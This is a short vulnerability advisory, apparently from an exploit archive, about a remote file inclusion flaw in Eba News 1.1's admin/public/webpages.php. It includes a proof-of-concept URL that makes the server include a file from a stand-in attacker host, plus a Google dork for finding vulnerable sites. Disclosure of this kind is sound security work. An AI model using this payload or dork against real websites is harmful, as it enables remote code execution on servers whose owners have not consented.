|
--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include
--------------------------------------------------
Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // ...
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
--------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Eba News
version : 1.1
vendor : http://ebascripts.com/
source url : http://ebascripts.com/
--------------------------------------------------
Description:
~~~~~~~~
EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.
--------------------------------------------------
Vulnerability:
~~~~~~~~~~~
I found vulnerability script in admin/public/webpages.php
Proof Of Concept:
~~~~~~~~~~~~
eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?
--------------------------------------------------
google d0rk:
~~~~~~~
"Eba News"
--------------------------------------------------
Solution:
~~~
- download new version in vendor URL
--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> www.starhack.org
~ My Bro -> PhantomOrchid
~ My Preceptor -> Earnk Kazno
--------------------------------------------------
Contact:
~~~
Seko[at]se-ko[dot]info
-------------------------------- [ EOF ]----------